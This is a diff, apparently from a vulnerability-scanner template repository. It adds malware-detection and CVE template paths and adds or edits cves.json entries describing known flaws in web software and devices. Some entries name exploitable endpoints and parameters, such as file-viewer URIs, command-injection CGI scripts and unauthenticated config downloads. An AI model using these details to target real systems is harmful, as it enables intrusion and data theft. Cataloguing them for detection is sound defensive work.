diff --git a/.github/scripts/wordpress-plugins-update-requirements.txt b/.github/scripts/wordpress-plugins-update-requirements.txt index 1271cdcb38..c40098b38d 100644 --- a/.github/scripts/wordpress-plugins-update-requirements.txt +++ b/.github/scripts/wordpress-plugins-update-requirements.txt @@ -1,6 +1,6 @@ beautifulsoup4==4.11.1 bs4==0.0.1 -certifi==2022.9.24 +certifi==2023.7.22 charset-normalizer==2.1.1 idna==3.4 Markdown==3.4.1 diff --git a/.new-additions b/.new-additions index 78231495e8..ed57c5c03c 100644 --- a/.new-additions +++ b/.new-additions @@ -1,12 +1,164 @@ +file/malware/aar-malware.yaml +file/malware/adzok-malware.yaml +file/malware/alfa-malware.yaml +file/malware/alienspy-malware.yaml +file/malware/alina-malware.yaml +file/malware/alpha-malware.yaml +file/malware/andromeda-malware.yaml +file/malware/ap0calypse-malware.yaml +file/malware/arcom-malware.yaml +file/malware/arkei-malware.yaml +file/malware/backoff-malware.yaml +file/malware/bandook-malware.yaml +file/malware/blacknix-malware.yaml +file/malware/blackworm-malware.yaml +file/malware/bluebanana-malware.yaml +file/malware/bozok-malware.yaml +file/malware/bublik-malware.yaml +file/malware/cap-hookexkeylogger-malware.yaml +file/malware/cerberus-malware.yaml +file/malware/clientmesh-malware.yaml +file/malware/crimson-malware.yaml +file/malware/cryptxxx-dropper-malware.yaml +file/malware/cryptxxx-malware.yaml +file/malware/cxpid-malware.yaml +file/malware/cythosia-malware.yaml +file/malware/darkrat-malware.yaml +file/malware/ddostf-malware.yaml +file/malware/derkziel-malware.yaml +file/malware/dexter-malware.yaml +file/malware/diamondfox-malware.yaml +file/malware/dmalocker-malware.yaml +file/malware/doublepulsar-malware.yaml +file/malware/eicar-malware.yaml +file/malware/erebus-malware.yaml +file/malware/ezcob-malware.yaml +file/malware/fudcrypt-malware.yaml +file/malware/gafgyt-bash-malware.yaml +file/malware/gafgyt-generic-malware.yaml +file/malware/gafgyt-hihi-malware.yaml +file/malware/gafgyt-hoho-malware.yaml +file/malware/gafgyt-jackmy-malware.yaml +file/malware/gafgyt-oh-malware.yaml +file/malware/genome-malware.yaml +file/malware/glass-malware.yaml +file/malware/glasses-malware.yaml +file/malware/gozi-malware.yaml +file/malware/gpgqwerty-malware.yaml +file/malware/greame-malware.yaml +file/malware/grozlex-malware.yaml +file/malware/hawkeye-malware.yaml +file/malware/imminent-malware.yaml +file/malware/infinity-malware.yaml +file/malware/insta11-malware.yaml +file/malware/intel-virtualization-malware.yaml +file/malware/iotreaper-malware.yaml +file/malware/linux-aesddos-malware.yaml +file/malware/linux-billgates-malware.yaml +file/malware/linux-elknot-malware.yaml +file/malware/linux-mrblack-malware.yaml +file/malware/linux-tsunami-malware.yaml +file/malware/locky-malware.yaml +file/malware/lostdoor-malware.yaml +file/malware/luminositylink-malware.yaml +file/malware/luxnet-malware.yaml +file/malware/macgyver-installer-malware.yaml +file/malware/macgyver-malware.yaml +file/malware/madness-malware.yaml +file/malware/miner--malware.yaml +file/malware/miniasp3-malware.yaml +file/malware/naikon-malware.yaml +file/malware/naspyupdate-malware.yaml +file/malware/notepad-malware.yaml +file/malware/olyx-malware.yaml +file/malware/osx-leverage-malware.yaml +file/malware/paradox-malware.yaml +file/malware/plasma-malware.yaml +file/malware/poetrat-malware.yaml +file/malware/pony-malware.yaml +file/malware/pubsab-malware.yaml +file/malware/punisher-malware.yaml +file/malware/pypi-malware.yaml +file/malware/pythorat-malware.yaml +file/malware/qrat-malware.yaml +file/malware/satana-dropper-malware.yaml +file/malware/satana-malware.yaml +file/malware/shimrat-malware.yaml +file/malware/shimratreporter-malware.yaml +file/malware/sigma-malware.yaml +file/malware/smallnet-malware.yaml +file/malware/snake-malware.yaml +file/malware/sub7nation-malware.yaml +file/malware/t5000-malware.yaml +file/malware/tedroo-malware.yaml +file/malware/terminator-malware.yaml +file/malware/teslacrypt-malware.yaml +file/malware/tox-malware.yaml +file/malware/treasurehunt-malware.yaml +file/malware/trickbot-malware.yaml +file/malware/trumpbot-malware.yaml +file/malware/universal-1337-malware.yaml +file/malware/unrecom-malware.yaml +file/malware/urausy-malware.yaml +file/malware/vertex-malware.yaml +file/malware/virusrat-malware.yaml +file/malware/wabot-malware.yaml +file/malware/warp-malware.yaml +file/malware/xhide-malware.yaml +file/malware/xor-ddos-malware.yaml +file/malware/yayih-malware.yaml +file/malware/zeghost-malware.yaml +file/malware/zoxpng-malware.yaml +http/cnvd/2021/CNVD-2021-41972.yaml +http/cnvd/2021/CNVD-2021-43984.yaml +http/cves/2018/CVE-2018-12909.yaml +http/cves/2018/CVE-2018-18809.yaml +http/cves/2018/CVE-2018-7653.yaml http/cves/2019/CVE-2019-14750.yaml +http/cves/2019/CVE-2019-16057.yaml +http/cves/2019/CVE-2019-7192.yaml http/cves/2022/CVE-2022-0169.yaml +http/cves/2022/CVE-2022-2414.yaml http/cves/2022/CVE-2022-40843.yaml http/cves/2023/CVE-2023-1698.yaml +http/cves/2023/CVE-2023-22478.yaml +http/cves/2023/CVE-2023-22480.yaml http/cves/2023/CVE-2023-32117.yaml http/cves/2023/CVE-2023-35082.yaml http/cves/2023/CVE-2023-37580.yaml +http/cves/2023/CVE-2023-39120.yaml +http/cves/2023/CVE-2023-39143.yaml +http/default-logins/bloofoxcms-default-login.yaml +http/exposed-panels/acenet-panel.yaml +http/exposed-panels/bloofoxcms-login-panel.yaml +http/exposed-panels/discuz-panel.yaml +http/exposed-panels/kodak-network-panel.yaml +http/exposed-panels/mpsec-isg1000-panel.yaml +http/exposures/files/socks5-vpn-config.yaml +http/misconfiguration/bitbucket-auth-bypass.yaml +http/misconfiguration/casdoor-users-password.yaml +http/misconfiguration/clickhouse-unauth-api.yaml +http/misconfiguration/installer/yzmcms-installer.yaml http/misconfiguration/mobsf-framework-exposure.yaml http/misconfiguration/openstack-config.yaml http/misconfiguration/oracle-reports-services.yaml +http/misconfiguration/sonarqube-projects-disclosure.yaml http/vulnerabilities/apache/apache-solr-rce.yaml +http/vulnerabilities/bsphp-info.yaml +http/vulnerabilities/discuz/discuz-api-pathinfo.yaml +http/vulnerabilities/joomla/joomla-department-sqli.yaml +http/vulnerabilities/netmizer/netmizer-cmd-rce.yaml +http/vulnerabilities/netmizer/netmizer-data-listing.yaml +http/vulnerabilities/other/acti-video-lfi.yaml +http/vulnerabilities/other/avcon6-execl-lfi.yaml +http/vulnerabilities/other/avcon6-lfi.yaml +http/vulnerabilities/other/clodop-printer-lfi.yaml +http/vulnerabilities/other/easyimage-downphp-lfi.yaml +http/vulnerabilities/other/kodak-network-lfi.yaml +http/vulnerabilities/other/sangfor-cphp-rce.yaml +http/vulnerabilities/other/sangfor-download-lfi.yaml +http/vulnerabilities/other/sangfor-sysuser-conf.yaml http/vulnerabilities/wordpress/photo-gallery-xss.yaml +http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml +http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml +http/vulnerabilities/zzzcms/zzzcms-xss.yaml diff --git a/cves.json b/cves.json index 19d8533442..b74c960364 100644 --- a/cves.json +++ b/cves.json @@ -477,6 +477,7 @@ {"ID":"CVE-2018-12675","Info":{"Name":"SV3C HD Camera L Series - Open Redirect","Severity":"medium","Description":"SV3C HD Camera L Series 2.3.4.2103-S50-NTD-B20170508B and 2.3.4.2103-S50-NTD-B20170823B contains an open redirect vulnerability. It does not perform origin checks on URLs in the camera's web interface, which can be leveraged to send a user to an unexpected endpoint. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-12675.yaml"} {"ID":"CVE-2018-1271","Info":{"Name":"Spring MVC Framework - Local File Inclusion","Severity":"medium","Description":"Spring MVC Framework versions 5.0 prior to 5.0.5 and versions 4.3 prior to 4.3.15 and older unsupported are vulnerable to local file inclusion because they allow applications to configure Spring MVC to serve static resources (e.g. CSS, JS, images). A malicious user can send a request using a specially crafted URL that can lead a directory traversal attack.","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2018/CVE-2018-1271.yaml"} {"ID":"CVE-2018-1273","Info":{"Name":"Spring Data Commons - Remote Code Execution","Severity":"critical","Description":"Spring Data Commons, versions prior to 1.13 to 1.13.10, 2.0 to 2.0.5,\nand older unsupported versions, contain a property binder vulnerability\ncaused by improper neutralization of special elements.\nAn unauthenticated remote malicious user (or attacker) can supply\nspecially crafted request parameters against Spring Data REST backed HTTP resources\nor using Spring Data's projection-based request payload binding hat can lead to a remote code execution attack.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-1273.yaml"} +{"ID":"CVE-2018-12909","Info":{"Name":"Webgrind \u003c= 1.5 - Local File Inclusion","Severity":"high","Description":"Webgrind 1.5 relies on user input to display a file, which lets anyone view files from the local filesystem (that the webserver user has access to) via an index.php?op=fileviewer\u0026file= URI\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-12909.yaml"} {"ID":"CVE-2018-12998","Info":{"Name":"Zoho manageengine - Cross-Site Scripting","Severity":"medium","Description":"Zoho manageengine is vulnerable to reflected cross-site scripting. This impacts Zoho ManageEngine Netflow Analyzer before build 123137, Network Configuration Manager before build 123128, OpManager before build 123148, OpUtils before build 123161, and Firewall Analyzer before build 123147 via the parameter 'operation' to /servlet/com.adventnet.me.opmanager.servlet.FailOverHelperServlet.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-12998.yaml"} {"ID":"CVE-2018-1335","Info":{"Name":"Apache Tika \u003c1.1.8- Header Command Injection","Severity":"high","Description":"Apache Tika versions 1.7 to 1.17 allow clients to send carefully crafted headers to tika-server that could be used to inject commands into the command line of the server running tika-server. This vulnerability only affects those running tika-server on a server that is open to untrusted clients.","Classification":{"CVSSScore":"8.1"}},"file_path":"http/cves/2018/CVE-2018-1335.yaml"} {"ID":"CVE-2018-13379","Info":{"Name":"Fortinet FortiOS - Credentials Disclosure","Severity":"critical","Description":"Fortinet FortiOS 6.0.0 to 6.0.4, 5.6.3 to 5.6.7 and 5.4.6 to 5.4.12 and FortiProxy 2.0.0, 1.2.0 to 1.2.8, 1.1.0 to 1.1.6, 1.0.0 to 1.0.7 under SSL VPN web portal allows an unauthenticated attacker to download system files via special crafted HTTP resource requests due to improper limitation of a pathname to a restricted directory (path traversal).","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-13379.yaml"} @@ -525,6 +526,7 @@ {"ID":"CVE-2018-18775","Info":{"Name":"Microstrategy Web 7 - Cross-Site Scripting","Severity":"medium","Description":"Microstrategy Web 7 does not sufficiently encode user-controlled inputs, resulting in cross-site scripting via the Login.asp Msg parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-18775.yaml"} {"ID":"CVE-2018-18777","Info":{"Name":"Microstrategy Web 7 - Local File Inclusion","Severity":"medium","Description":"Microstrategy Web 7 is vulnerable to local file inclusion via \"/WebMstr7/servlet/mstrWeb\" (in the parameter subpage). Remote authenticated users can bypass intended SecurityManager restrictions and list a parent directory via a /.. (slash dot dot) in a pathname used by a web application. NOTE: this is a deprecated product.\n","Classification":{"CVSSScore":"4.3"}},"file_path":"http/cves/2018/CVE-2018-18777.yaml"} {"ID":"CVE-2018-18778","Info":{"Name":"ACME mini_httpd \u003c1.30 - Local File Inclusion","Severity":"medium","Description":"ACME mini_httpd before 1.30 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2018/CVE-2018-18778.yaml"} +{"ID":"CVE-2018-18809","Info":{"Name":"TIBCO JasperReports Library - Directory Traversal","Severity":"critical","Description":"The default server implementation of TIBCO Software Inc.'s TIBCO JasperReports Library, TIBCO JasperReports Library Community Edition, TIBCO JasperReports Library for ActiveMatrix BPM, TIBCO JasperReports Server, TIBCO JasperReports Server Community Edition, TIBCO JasperReports Server for ActiveMatrix BPM, TIBCO Jaspersoft for AWS with Multi-Tenancy, and TIBCO Jaspersoft Reporting and Analytics for AWS contains a directory-traversal vulnerability that may theoretically allow web server users to access contents of the host system.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2018/CVE-2018-18809.yaml"} {"ID":"CVE-2018-18925","Info":{"Name":"Gogs (Go Git Service) 0.11.66 - Remote Code Execution","Severity":"critical","Description":"Gogs 0.11.66 allows remote code execution because it does not properly validate session IDs, as demonstrated by a \"..\" session-file forgery in the file session provider in file.go. This is related to session ID handling in the go-macaron/session code for Macaron.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-18925.yaml"} {"ID":"CVE-2018-19136","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site scripting via assets/edit/registrar-account.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-19136.yaml"} {"ID":"CVE-2018-19137","Info":{"Name":"DomainMOD 4.11.01 - Cross-Site Scripting","Severity":"medium","Description":"DomainMOD 4.11.01 is vulnerable to reflected cross-site Scripting via assets/edit/ip-address.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-19137.yaml"} @@ -575,6 +577,7 @@ {"ID":"CVE-2018-7490","Info":{"Name":"uWSGI PHP Plugin Local File Inclusion","Severity":"high","Description":"uWSGI PHP Plugin before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, making it susceptible to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7490.yaml"} {"ID":"CVE-2018-7600","Info":{"Name":"Drupal - Remote Code Execution","Severity":"critical","Description":"Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7600.yaml"} {"ID":"CVE-2018-7602","Info":{"Name":"Drupal - Remote Code Execution","Severity":"critical","Description":"Drupal 7.x and 8.x contain a remote code execution vulnerability that exists within multiple subsystems. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2018/CVE-2018-7602.yaml"} +{"ID":"CVE-2018-7653","Info":{"Name":"YzmCMS v3.6 - Cross-Site Scripting","Severity":"medium","Description":"In YzmCMS 3.6, index.php has XSS via the a, c, or m parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2018/CVE-2018-7653.yaml"} {"ID":"CVE-2018-7662","Info":{"Name":"CouchCMS \u003c= 2.0 - Path Disclosure","Severity":"medium","Description":"CouchCMS \u003c= 2.0 allows remote attackers to discover the full path via a direct request to includes/mysql2i/mysql2i.func.php or addons/phpmailer/phpmailer.php.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2018/CVE-2018-7662.yaml"} {"ID":"CVE-2018-7700","Info":{"Name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","Severity":"high","Description":"DedeCMS 5.7SP2 is susceptible to cross-site request forgery with a corresponding impact of arbitrary code execution because the partcode parameter in a tag_test_action.php request can specify a runphp field in conjunction with PHP code.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2018/CVE-2018-7700.yaml"} {"ID":"CVE-2018-7719","Info":{"Name":"Acrolinx Server \u003c5.2.5 - Local File Inclusion","Severity":"high","Description":"Acrolinx Server prior to 5.2.5 suffers from a local file inclusion vulnerability.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2018/CVE-2018-7719.yaml"} @@ -647,6 +650,7 @@ {"ID":"CVE-2019-15858","Info":{"Name":"WordPress Woody Ad Snippets \u003c2.2.5 - Cross-Site Scripting/Remote Code Execution","Severity":"high","Description":"WordPress Woody Ad Snippets prior to 2.2.5 is susceptible to cross-site scripting and remote code execution via admin/includes/class.import.snippet.php, which allows unauthenticated options import as demonstrated by storing a cross-site scripting payload for remote code execution.\n","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2019/CVE-2019-15858.yaml"} {"ID":"CVE-2019-15859","Info":{"Name":"Socomec DIRIS A-40 Devices Password Disclosure","Severity":"critical","Description":"Socomec DIRIS A-40 devices before 48250501 are susceptible to a password disclosure vulnerability in the web interface that could allow remote attackers to get full access to a device via the /password.jsn URI.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-15859.yaml"} {"ID":"CVE-2019-15889","Info":{"Name":"WordPress Download Manager \u003c2.9.94 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Download Manager plugin before 2.9.94 contains a cross-site scripting vulnerability via the category shortcode feature, as demonstrated by the orderby or search[publish_date] parameter.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-15889.yaml"} +{"ID":"CVE-2019-16057","Info":{"Name":"D-Link DNS-320 - Remote Code Execution","Severity":"critical","Description":"The login_mgr.cgi script in D-Link DNS-320 through 2.05.B10 is vulnerable to remote command injection.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-16057.yaml"} {"ID":"CVE-2019-16097","Info":{"Name":"Harbor \u003c=1.82.0 - Privilege Escalation","Severity":"medium","Description":"Harbor 1.7.0 through 1.8.2 is susceptible to privilege escalation via core/api/user.go, which allows allows non-admin users to create admin accounts via the POST /api/users API when Harbor is setup with DB as an authentication backend and allows user to do self-registration.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2019/CVE-2019-16097.yaml"} {"ID":"CVE-2019-16123","Info":{"Name":"PilusCart \u003c=1.4.1 - Local File Inclusion","Severity":"high","Description":"PilusCart versions 1.4.1 and prior suffer from a file disclosure vulnerability via local file inclusion.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-16123.yaml"} {"ID":"CVE-2019-16278","Info":{"Name":"nostromo 1.9.6 - Remote Code Execution","Severity":"critical","Description":"nostromo nhttpd through 1.9.6 allows an attacker to achieve remote code execution via directory traversal in the function http_verify.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-16278.yaml"} @@ -715,6 +719,7 @@ {"ID":"CVE-2019-6715","Info":{"Name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","Severity":"high","Description":"WordPress plugin W3 Total Cache before version 0.9.4 allows remote attackers to read arbitrary files via the SubscribeURL field in SubscriptionConfirmation JSON data via pub/sns.php.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-6715.yaml"} {"ID":"CVE-2019-6799","Info":{"Name":"phpMyAdmin \u003c4.8.5 - Local File Inclusion","Severity":"medium","Description":"phpMyAdmin before 4.8.5 is susceptible to local file inclusion. When the AllowArbitraryServer configuration setting is set to true, an attacker can read, with the use of a rogue MySQL server, any file on the server that the web server's user can access. This is related to the mysql.allow_local_infile PHP configuration, and the inadvertent ignoring of options(MYSQLI_OPT_LOCAL_INFIL calls.\n","Classification":{"CVSSScore":"5.9"}},"file_path":"http/cves/2019/CVE-2019-6799.yaml"} {"ID":"CVE-2019-6802","Info":{"Name":"Pypiserver \u003c1.2.5 - Carriage Return Line Feed Injection","Severity":"medium","Description":"Pypiserver through 1.2.5 and below is susceptible to carriage return line feed injection. An attacker can set arbitrary HTTP headers and possibly conduct cross-site scripting attacks via a %0d%0a in a URI.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-6802.yaml"} +{"ID":"CVE-2019-7192","Info":{"Name":"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution","Severity":"critical","Description":"This improper access control vulnerability allows remote attackers to gain unauthorized access to the system. To fix these vulnerabilities, QNAP recommend updating Photo Station to their latest versions.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7192.yaml"} {"ID":"CVE-2019-7219","Info":{"Name":"Zarafa WebApp \u003c=2.0.1.47791 - Cross-Site Scripting","Severity":"medium","Description":"Zarafa WebApp 2.0.1.47791 and earlier contains an unauthenticated reflected cross-site scripting vulnerability. An attacker can execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2019/CVE-2019-7219.yaml"} {"ID":"CVE-2019-7238","Info":{"Name":"Sonatype Nexus Repository Manager \u003c3.15.0 - Remote Code Execution","Severity":"critical","Description":"Sonatype Nexus Repository Manager before 3.15.0 is susceptible to remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2019/CVE-2019-7238.yaml"} {"ID":"CVE-2019-7254","Info":{"Name":"eMerge E3 1.00-06 - Local File Inclusion","Severity":"high","Description":"Linear eMerge E3-Series devices are vulnerable to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2019/CVE-2019-7254.yaml"} @@ -1085,7 +1090,7 @@ {"ID":"CVE-2021-24435","Info":{"Name":"WordPress Titan Framework plugin \u003c= 1.12.1 - Cross-Site Scripting","Severity":"medium","Description":"The iframe-font-preview.php file of the titan-framework does not properly escape the font-weight and font-family GET parameters before outputting them back in an href attribute, leading to Reflected Cross-Site Scripting issues.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24435.yaml"} {"ID":"CVE-2021-24436","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.4 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.4 is susceptible to cross-site scripting within the extension parameter in the Extensions dashboard, which is output in an attribute without being escaped first. This can allow an attacker to convince an authenticated admin into clicking a link to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24436.yaml"} {"ID":"CVE-2021-24452","Info":{"Name":"WordPress W3 Total Cache \u003c2.1.5 - Cross-Site Scripting","Severity":"medium","Description":"WordPress W3 Total Cache plugin before 2.1.5 is susceptible to cross-site scripting via the extension parameter in the Extensions dashboard, when the setting 'Anonymously track usage to improve product quality' is enabled. The parameter is output in a JavaScript context without proper escaping. This can allow an attacker, who can convince an authenticated admin into clicking a link, to run malicious JavaScript within the user's web browser, which could lead to full site compromise.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24452.yaml"} -{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"} +{"ID":"CVE-2021-24472","Info":{"Name":"Onair2 \u003c 3.9.9.2 \u0026 KenthaRadio \u003c 2.0.2 - Remote File Inclusion/Server-Side Request Forgery","Severity":"critical","Description":"Onair2 \u003c 3.9.9.2 and KenthaRadio \u003c 2.0.2 have exposed proxy functionality to unauthenticated users. Sending requests to this proxy functionality will have the web server fetch and display the content from any URI, allowing remote file inclusion and server-side request forgery.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-24472.yaml"} {"ID":"CVE-2021-24488","Info":{"Name":"WordPress Post Grid \u003c2.1.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Post Grid plugin before 2.1.8 contains a reflected cross-site scripting vulnerability. The slider import search feature and tab parameter of thesettings are not properly sanitized before being output back in the pages,","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24488.yaml"} {"ID":"CVE-2021-24495","Info":{"Name":"Wordpress Marmoset Viewer \u003c1.9.3 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Marmoset Viewer plugin before 1.9.3 contains a cross-site scripting vulnerability. It does not property sanitize, validate, or escape the 'id' parameter before outputting back in the page.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24495.yaml"} {"ID":"CVE-2021-24498","Info":{"Name":"WordPress Calendar Event Multi View \u003c1.4.01 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Calendar Event Multi View plugin before 1.4.01 contains an unauthenticated reflected cross-site scripting vulnerability. It does not sanitize or escape the 'start' and 'end' GET parameters before outputting them in the page (via php/edit.php).","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-24498.yaml"} @@ -1548,6 +1553,7 @@ {"ID":"CVE-2022-24112","Info":{"Name":"Apache APISIX - Remote Code Execution","Severity":"critical","Description":"A default configuration of Apache APISIX (with default API key) is vulnerable to remote code execution. An attacker can abuse the batch-requests plugin to send requests to bypass the IP restriction of Admin API. When the admin key was changed or the port of Admin API was changed to a port different from the data panel, the impact is lower. But there is still a risk to bypass the IP restriction of Apache APISIX's data panel. There is a check in the batch-requests plugin which overrides the client IP with its real remote IP. But due to a bug in the code, this check can be bypassed.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24112.yaml"} {"ID":"CVE-2022-24124","Info":{"Name":"Casdoor 1.13.0 - Unauthenticated SQL Injection","Severity":"high","Description":"Casdoor version 1.13.0 suffers from a remote unauthenticated SQL injection vulnerability via the query API in Casdoor before 1.13.1 related to the field and value parameters, as demonstrated by api/get-organizations.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24124.yaml"} {"ID":"CVE-2022-24129","Info":{"Name":"Shibboleth OIDC OP \u003c3.0.4 - Server-Side Request Forgery","Severity":"high","Description":"The Shibboleth Identity Provider OIDC OP plugin before 3.0.4 is vulnerable to server-side request forgery (SSRF) due to insufficient restriction of the request_uri parameter, which allows attackers to interact with arbitrary third-party HTTP services.","Classification":{"CVSSScore":"8.2"}},"file_path":"http/cves/2022/CVE-2022-24129.yaml"} +{"ID":"CVE-2022-2414","Info":{"Name":"FreeIPA - XML Entity Injection","Severity":"high","Description":"Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-2414.yaml"} {"ID":"CVE-2022-24181","Info":{"Name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","Severity":"medium","Description":"PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24181.yaml"} {"ID":"CVE-2022-24223","Info":{"Name":"Atom CMS v2.0 - SQL Injection","Severity":"critical","Description":"AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24223.yaml"} {"ID":"CVE-2022-24260","Info":{"Name":"VoipMonitor - Pre-Auth SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24260.yaml"} @@ -1857,6 +1863,8 @@ {"ID":"CVE-2023-2122","Info":{"Name":"Image Optimizer by 10web \u003c 1.0.26 - Cross-Site Scripting","Severity":"medium","Description":"Image Optimizer by 10web before 1.0.26 is susceptible to cross-site scripting via the iowd_tabs_active parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-2122.yaml"} {"ID":"CVE-2023-2130","Info":{"Name":"Purchase Order Management v1.0 - SQL Injection","Severity":"critical","Description":"A vulnerability classified as critical has been found in SourceCodester Purchase Order Management System 1.0. Affected is an unknown function of the file /admin/suppliers/view_details.php of the component GET Parameter Handler. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-226206 is the identifier assigned to this vulnerability.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2130.yaml"} {"ID":"CVE-2023-2178","Info":{"Name":"Aajoda Testimonials \u003c 2.2.2 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitize and escape some of its settings, which could allow high-privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-2178.yaml"} +{"ID":"CVE-2023-22478","Info":{"Name":"KubePi \u003c= v1.6.4 LoginLogsSearch - Unauthorized Access","Severity":"high","Description":"KubePi is a modern Kubernetes panel. The API interfaces with unauthorized entities and may leak sensitive information. This issue has been patched in version 1.6.4. There are currently no known workarounds.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-22478.yaml"} +{"ID":"CVE-2023-22480","Info":{"Name":"KubeOperator Foreground `kubeconfig` - File Download","Severity":"critical","Description":"KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has 